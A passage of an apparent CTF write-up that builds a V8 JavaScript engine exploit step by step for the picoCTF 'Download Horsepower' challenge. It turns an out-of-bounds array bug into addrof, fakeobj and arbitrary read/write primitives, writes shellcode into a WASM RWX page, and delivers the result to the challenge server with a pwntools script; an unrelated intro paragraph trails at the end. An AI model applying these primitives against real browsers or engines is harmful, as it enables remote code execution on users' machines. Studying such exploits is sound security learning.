0xa5e08085160: 0x0000000408042a99 0x3ff8000000000000
0xa5e08085170: 0x4004000000000000 0x0804222d082439f1
The first value 0x0000000408042a99
is the length
smi (a value of 2
, doubled as it's an smi) followed by what I assume is a pointer to the map. That's not important - what's important is the next two values are the floating-point representations of 1.5
and 2.5
(I recognise them from oob-v8!), while the value directly after is 0x0804222d082439f1
, the properties
and map
pointer. This means our OOB can work as planned! We just have to ensure we preserve the top 32 bits of this value so we don't ruin the properties
pointer.
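As an illustration (a hypothetical helper, not part of the original exploit), keeping the high half of such a slot intact while swapping out the low half could look like this:
// Hypothetical helper: replace only the low 32 bits (the map) of a 64-bit slot,
// keeping the high 32 bits (the properties pointer) untouched
function swap_low32(slot_float, new_low) {
    let high = ftoi(slot_float) & (0xffffffffn << 32n);
    return itof(high | (new_low & 0xffffffffn));
}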
Let's test that the OOB works as we expected by calling setHorsepower()
on an array, and reading past the end.
d8> a.setHorsepower(5)
[1.5, 2.5, , , ]
d8> a[2]
4.763796150676345e-270
d8> ftoi(a[2]).toString(16)
"804222d082439f1"
Fantastic!
This is a bit more complicated than in oob-v8, because of one simple fact: last time, we gained an addrof
primitive using this:
var float_arr = [1.5, 2.5];
var map_float = float_arr.oob();
var initial_obj = {a:1}; // placeholder object
var obj_arr = [initial_obj];
var map_obj = obj_arr.oob();
function addrof(obj) {
    obj_arr[0] = obj; // put desired obj for address leak into index 0
    obj_arr.oob(map_float); // change to float map
    let leak = obj_arr[0]; // read address
    obj_arr.oob(map_obj); // change back to object map, to prevent issues down the line
    return ftoi(leak); // return leak as an integer
}
In our current scenario, you could argue that we can reuse this (with minor modifications) and get this:
var float_arr = [1.5, 2.5];
float_arr.setHorsepower(3);
var map_float = float_arr[2];
var initial_obj = {a:1}; // placeholder object
var obj_arr = [initial_obj];
obj_arr.setHorsepower(2);
var map_obj = obj_arr[1];
function addrof(obj) {
    obj_arr[0] = obj; // put desired obj for address leak into index 0
    obj_arr[1] = map_float; // change to float map
    let leak = obj_arr[0]; // read address
    obj_arr[1] = map_obj; // change back to object map, to prevent issues down the line
    return ftoi(leak); // return leak as an integer
}
However, this does not work. Why? It's the difference between these two lines:
var map_obj = obj_arr.oob();
var map_obj = obj_arr[1];
In oob-v8, we noted that the function .oob()
not only reads an index past the end, but it also returns it as a double. And that's the key difference - in this challenge, we can read past the end of the array, but this time it's treated as an object. obj_arr[1]
will, therefore, return an object - and a pretty invalid one, at that!
You might be thinking that we don't need the object map to get an addrof
primitive at all - sure, we can't set the map back, but we could just create a one-use array. I spent an age working out why that didn't work and kept returning NaN
, but of course it was this line:
obj_arr[1] = map_float;
Setting the map to that of a float array would never work, as it would treat the first index like an object again!
So, this time we can't copy the object map so easily. But not all is lost! Instead of having a single OOB read/write, we can set the array to have a huge length
. This way, we can use an OOB on the float array to read the map of the object array - if we set it correctly, that is.
Let's create two arrays, one of floats and one of objects. We'll also grab the float map (which will also contain the properties
pointer!) while we're at it.
var float_arr = [1.5, 2.5];
float_arr.setHorsepower(50);
var float_map = float_arr[2]; // both map and properties
var initial_obj = {a:1}; // placeholder object
var obj_arr = [initial_obj];
obj_arr.setHorsepower(50);
My initial thought was to create an array like this:
var obj_arr = [3.5, 3.5, initial_obj];
And then I could slowly increment the index of float_arr
, reading along in memory until we came across two 3.5
values in a row. I would then know that the location directly after was our desired object, making a reliable leak. Unfortunately, while debugging, it seems like mixed arrays are not quite that simple (unsurprisingly, perhaps). Instead, I'm gonna hope and pray that the offset is constant (and if it's not, we'll come back and play with the mixed array further).
Let's determine the offset. I'm gonna %DebugPrint
float_arr
, obj_arr
and initial_obj
:
DebugPrint: 0x30e008085931: [JSArray]
- map: 0x30e0082439f1 <Map(PACKED_DOUBLE_ELEMENTS)> [FastProperties]
- prototype: 0x30e00820ab61 <JSArray[0]>
- elements: 0x30e008085919 <FixedDoubleArray[2]> [PACKED_DOUBLE_ELEMENTS]
- length: 50
- properties: 0x30e00804222d <FixedArray[0]>
- All own properties (excluding elements): {
0x30e0080446d1: [String] in ReadOnlySpace: #length: 0x30e00818215d <AccessorInfo> (const accessor descriptor), location: descriptor
}
- elements: 0x30e008085919 <FixedDoubleArray[2]> {
0: 1.5
1: 2.5
}
DebugPrint: 0x30e008085985: [JSArray]
- map: 0x30e008243a41 <Map(PACKED_ELEMENTS)> [FastProperties]
- prototype: 0x30e00820ab61 <JSArray[0]>
- elements: 0x30e008085979 <FixedArray[1]> [PACKED_ELEMENTS]
- length: 50
- properties: 0x30e00804222d <FixedArray[0]>
- All own properties (excluding elements): {
0x30e0080446d1: [String] in ReadOnlySpace: #length: 0x30e00818215d <AccessorInfo> (const accessor descriptor), location: descriptor
}
- elements: 0x30e008085979 <FixedArray[1]> {
0: 0x30e00808594d <Object map = 0x30e0082459f9>
}
DebugPrint: 0x30e00808594d: [JS_OBJECT_TYPE]
- map: 0x30e0082459f9 <Map(HOLEY_ELEMENTS)> [FastProperties]
- prototype: 0x30e008202f11 <Object map = 0x30e0082421b9>
- elements: 0x30e00804222d <FixedArray[0]> [HOLEY_ELEMENTS]
- properties: 0x30e00804222d <FixedArray[0]>
- All own properties (excluding elements): {
0x30e0080477ed: [String] in ReadOnlySpace: #a: 1 (const data field 0), location: in-object
}
Let's check the obj_arr
first:
gef➤ x/6gx 0x30e008085979-1
0x30e008085978: 0x0000000208042205 0x08243a410808594d
0x30e008085988: 0x080859790804222d 0x080425a900000064
0x30e008085998: 0x0000000400000003 0x0000000029386428
In line with what we get from %DebugPrint()
, we can see the lower 4 bytes of the object pointer, 0808594d
. If we print from elements
onwards for the float_arr
:
gef➤ x/20gx 0x30e008085919-1
0x30e008085918: 0x0000000408042a99 0x3ff8000000000000
0x30e008085928: 0x4004000000000000 0x0804222d082439f1
0x30e008085938: 0x0000006408085919 0x082439f1080423d1
0x30e008085948: 0x082459f90804222d 0x0804222d0804222d
0x30e008085958: 0x08045a0100000002 0x0000000000010001
0x30e008085968: 0x080477ed080421f9 0x0000000200000088
0x30e008085978: 0x0000000208042205 0x08243a410808594d
0x30e008085988: 0x080859790804222d 0x080425a900000064
0x30e008085998: 0x0000000400000003 0x0000000029386428
0x30e0080859a8: 0x0000000000000000 0x0000000000000000
We can see the value 0x08243a410808594d
at 0x30e008085980
. If the value 1.5
at 0x30e008085920
is index 0
, we can count and get an index of 12
. Let's try that:
function addrof(obj) {
    obj_arr[0] = obj;
    let leak = float_arr[12];
    return ftoi(leak);
}
%DebugPrint(initial_obj);
console.log("Leak: 0x" + addrof(initial_obj).toString(16))
And from the output, it looks very promising!
Leak: 0x8243a410808593d
DebugPrint: 0x28a60808593d: [JS_OBJECT_TYPE]
- map: 0x28a6082459f9 <Map(HOLEY_ELEMENTS)> [FastProperties]
- prototype: 0x28a608202f11 <Object map = 0x28a6082421b9>
- elements: 0x28a60804222d <FixedArray[0]> [HOLEY_ELEMENTS]
- properties: 0x28a60804222d <FixedArray[0]>
- All own properties (excluding elements): {
0x28a6080477ed: [String] in ReadOnlySpace: #a: 1 (const data field 0), location: in-object
}
The lower 4 bytes match up perfectly. We're gonna return just the last 4 bytes:
return ftoi(leak) & 0xffffffffn;
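Putting the pieces together, the finished addrof() ends up looking something like this (just the earlier function with the mask applied):
function addrof(obj) {
    obj_arr[0] = obj;                 // place the target object at index 0
    let leak = float_arr[12];         // read it back OOB through the float array
    return ftoi(leak) & 0xffffffffn;  // keep only the compressed (lower 32-bit) pointer
}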
And bam, we have an addrof()
primitive. Time to get a fakeobj()
.
If we follow the same principle for fakeobj()
:
function fakeobj(compressed_addr) {
    float_arr[12] = itof(compressed_addr);
    return obj_arr[0];
}
However, remember that pointer compression is a thing! We have to make sure the upper 4 bytes are consistent. This isn't too bad, as we can read it once and remember it for all future sets:
// store upper 4 bytes of leak
let upper = ftoi(float_arr[12]) & (0xffffffffn << 32n);
And then fakeobj()
becomes
function fakeobj(compressed_addr) {
    float_arr[12] = itof(upper + compressed_addr);
    return obj_arr[0];
}
We can test this with the following code:
// first leak the address
let addr_initial = addrof(initial_obj);
// now try and create an object from it
let fake = fakeobj(addr_initial);
// fake should now be pointing to initial_obj
// meaning fake.a should be 1
console.log(fake.a);
If I run this, it does in fact print 1
:
gef➤ run --allow-natives-syntax --shell exploit.js
1
V8 version 9.1.0 (candidate)
d8>
Once again, we're gonna try and gain an arbitrary read by creating a fake array object that we can control the elements
pointer for. The offsets are gonna be slightly different due to pointer compression. As we saw earlier, the first 8 bytes hold the compressed properties
and map
pointers, while the second 8 bytes hold the length
smi and the compressed elements
pointer. Let's create an initial arb_rw_arr
like before, and print out the layout:
var arb_rw_arr = [float_map, 1.5, 2.5, 3.5];
console.log("[+] Address of Arbitrary RW Array: 0x" + addrof(arb_rw_arr).toString(16));
%DebugPrint(arb_rw_arr)
[+] Address of Arbitrary RW Array: 0x8085a01
DebugPrint: 0x161c08085a01: [JSArray]
- map: 0x161c082439f1 <Map(PACKED_DOUBLE_ELEMENTS)> [FastProperties]
- prototype: 0x161c0820ab61 <JSArray[0]>
- elements: 0x161c080859d9 <FixedDoubleArray[4]> [PACKED_DOUBLE_ELEMENTS]
- length: 4
- properties: 0x161c0804222d <FixedArray[0]>
- All own properties (excluding elements): {
0x161c080446d1: [String] in ReadOnlySpace: #length: 0x161c0818215d <AccessorInfo> (const accessor descriptor), location: descriptor
}
- elements: 0x161c080859d9 <FixedDoubleArray[4]> {
0: 4.7638e-270
1: 1.5
2: 2.5
3: 3.5
}
The leak works perfectly. Once again, elements
is ahead of the JSArray
itself.
If we want to try and fake an array with compression pointers then we have the following format:
32-bit pointer to properties
32-bit pointer to map
smi for length
32-bit pointer to elements
The first ones we have already solved with float_map
. We can fix the latter like this:
function arb_read(compressed_addr) {
    // tag pointer
    if (compressed_addr % 2n == 0)
        compressed_addr += 1n;
    // place a fake object over the elements of the valid array
    // we know the elements array is placed just ahead in memory, so with a length
    // of 4 it's an offset of 4 * 0x8 = 0x20
    let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);
    // overwrite `elements` field of fake array
    // with a size of 2 and the target elements pointer
    arb_rw_arr[1] = itof((0x2n << 33n) + compressed_addr);
    // index 0 will return the arbitrary read value
    return ftoi(fake[0]);
}
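To spell out the packing used on arb_rw_arr[1] above, here is a worked example (the elements pointer here is made up):
// The second 8 bytes of a JSArray are [length smi | compressed elements pointer].
// A length of 2 is the smi 4 (2 << 1) in the upper 32 bits, so:
//   (4n << 32n) | elements  ==  (0x2n << 33n) + elements
let example_elements = 0x08085161n;              // made-up compressed pointer
let packed = (0x2n << 33n) + example_elements;
console.log(packed.toString(16));                // "408085161"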
We can test the arbitrary read, and I'm going to do this by grabbing the float_map
location and reading the data there:
// test arb_read
let float_map_lower = ftoi(float_map) & 0xffffffffn
console.log("Map at: 0x" + float_map_lower.toString(16))
console.log("Read: 0x" + arb_read(float_map_lower).toString(16));
Map at: 0x82439f1
Read: 0xa0007ff2100043d
A little bit of inspection at the location of float_map
shows us we're 8 bytes off:
gef➤ x/10gx 0x3f09082439f1-1
0x3f09082439f0: 0x1604040408042119 0x0a0007ff2100043d
0x3f0908243a00: 0x082439c90820ab61 0x080421b90820b031
0x3f0908243a10: 0x0820b07d08182405 0x1604040408042119
This is because the first 8 bytes in the elements
array are for the length
smi and then a compressed map pointer, so we just subtract 8
and get a valid arb_read()
:
function arb_read(compressed_addr) {
    // tag pointer
    if (compressed_addr % 2n == 0)
        compressed_addr += 1n;
    // place a fake object over the elements of the valid array
    // we know the elements array is placed just ahead in memory, so with a length
    // of 4 it's an offset of 4 * 0x8 = 0x20
    let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);
    // overwrite `elements` field of fake array
    // with a size of 2 and the target elements pointer
    // the elements array starts with its map and length smi, so subtract 0x8
    arb_rw_arr[1] = itof((0x2n << 33n) + compressed_addr - 8n);
    // index 0 will return the arbitrary read value
    return ftoi(fake[0]);
}
We can continue with the initial_arb_write()
from oob-v8, with a couple of minor changes:
function initial_arb_write(compressed_addr, val) {
    // place a fake object and change elements, as before
    let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);
    arb_rw_arr[1] = itof((0x2n << 33n) + compressed_addr - 8n);
    // Write to index 0
    fake[0] = itof(BigInt(val));
}
We can test this super easily too, with the same principle:
let float_map_lower = ftoi(float_map) & 0xffffffffn;
console.log("Map at: 0x" + float_map_lower.toString(16));
initial_arb_write(float_map_lower, 0x12345678n);
Observing the map location in GDB tells us the write worked:
gef➤ x/4gx 0xf84082439f1-1
0xf84082439f0: 0x0000000012345678 0x0a0007ff2100043d
0xf8408243a00: 0x082439c90820ab61 0x080421b90820b031
Last time we improved our technique by using ArrayBuffer
backing pointers. This is a bit harder this time because for this approach you need to know the full 64-bit pointers, not just the compressed version. This is genuinely very difficult because the isolate root is stored in the r13 register, not anywhere in memory. As a result, we're going to be using initial_arb_write()
as if it's arb_write()
, and hoping it works.
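Since the copy_shellcode() snippet further down calls arb_write(), I'll assume it is just a thin alias along these lines (my own naming, in the spirit of the sentence above):
// We can't recover the isolate root, so treat the compressed-address write as the
// general-purpose write primitive
function arb_write(compressed_addr, val) {
    initial_arb_write(compressed_addr, val);
}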
If anybody knows of a way to leak the isolate root, please let me know!
The final step is to shellcode our way through, using the same technique as last time. The offsets are slightly different, but I'm sure that by this point you can find them yourself!
First I'll use any WASM code to create the RWX page, like I did for oob-v8:
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;
Again, this generates an RWX page:
gef➤ vmmap
[...]
0x000007106675a000 0x000007106675b000 0x0000000000000000 rwx
[...]
Using the same technique of printing out the wasm_instance
address and comparing it to the output of search-pattern
from before:
gef➤ search-pattern 0x000007106675a000
[+] Searching '\x00\xa0\x75\x66\x10\x07\x00\x00' in memory
[+] In (0x3c108200000-0x3c108280000), permission=rw-
0x3c108211ad4 - 0x3c108211af4 → "\x00\xa0\x75\x66\x10\x07\x00\x00[...]"
[...]
I get an offset of 0x67
. In reality it is 0x68
(pointer tagging!), but who cares.
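The writeup doesn't show the corresponding code, but judging from the "[+] RWX Region located at" line in the output further down, it boils down to something like this (the 0x67 offset and the variable names are my reconstruction):
// Hypothetical reconstruction: read the full 64-bit RWX page pointer out of the
// wasm instance at the offset found above
let rwx_base = arb_read(addrof(wasm_instance) + 0x67n);
console.log("[+] RWX Region located at 0x" + rwx_base.toString(16));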
Now we can use the ArrayBuffer
technique, because we know all the bits of the address! We can just yoink it directly from the oob-v8 writeup (slightly changing 0x20
to 0x14
, as that is the new offset with compression):
function copy_shellcode(addr, shellcode) {
    // create a buffer of 0x100 bytes
    let buf = new ArrayBuffer(0x100);
    let dataview = new DataView(buf);
    // overwrite the backing store so the 0x100 bytes can be written to where we want
    let buf_addr = addrof(buf);
    let backing_store_addr = buf_addr + 0x14n;
    arb_write(backing_store_addr, addr);
    // write the shellcode 4 bytes at a time
    for (let i = 0; i < shellcode.length; i++) {
        dataview.setUint32(4*i, shellcode[i], true);
    }
}
I am going to grab the shellcode for cat flag.txt
from this writeup, because I suck ass at working out endianness and it's a lot of effort for a fail :)))
payload = [0x0cfe016a, 0x2fb84824, 0x2f6e6962, 0x50746163, 0x68e78948, 0x7478742e, 0x0101b848, 0x01010101, 0x48500101, 0x756062b8, 0x606d6701, 0x04314866, 0x56f63124, 0x485e0c6a, 0x6a56e601, 0x01485e10, 0x894856e6, 0x6ad231e6, 0x050f583b]
copy_shellcode(rwx_base, payload);
f();
Running this:
$ ./d8 exploit.js
[+] Address of Arbitrary RW Array: 0x8086551
[+] RWX Region located at 0xf06b12a5000
cat: flag.txt: No such file or directory
Ok, epic! Let's deliver it remote using the same script as Kit Engine:
from pwn import *
with open("exploit.js", "rb") as f:
    exploit = f.read()
p = remote('mercury.picoctf.net', 60233)
p.sendlineafter(b'5k:', str(len(exploit)).encode())
p.sendlineafter(b'please!!\n', exploit)
p.recvuntil(b"Stdout b'")
flag = p.recvuntil(b"\\")[:-1]
print(flag.decode())
And we get the flag!
$ python3 deliver.py
[+] Opening connection to mercury.picoctf.net on port 60233: Done
picoCTF{sh0u1d_hAv3_d0wnl0ad3d_m0r3_rAm_3a9ef72562166255}
[*] Closed connection to mercury.picoctf.net port 60233
This is going to document my journey into V8 exploitation, and hopefully provide some tools to help you learn too.
To start with, we're going to go through *CTF's OOB-V8 challenge, mostly following Faith's brilliantly in-depth writeup. From there, well, we'll see.
Saelo's classic V8 paper is also a goldmine.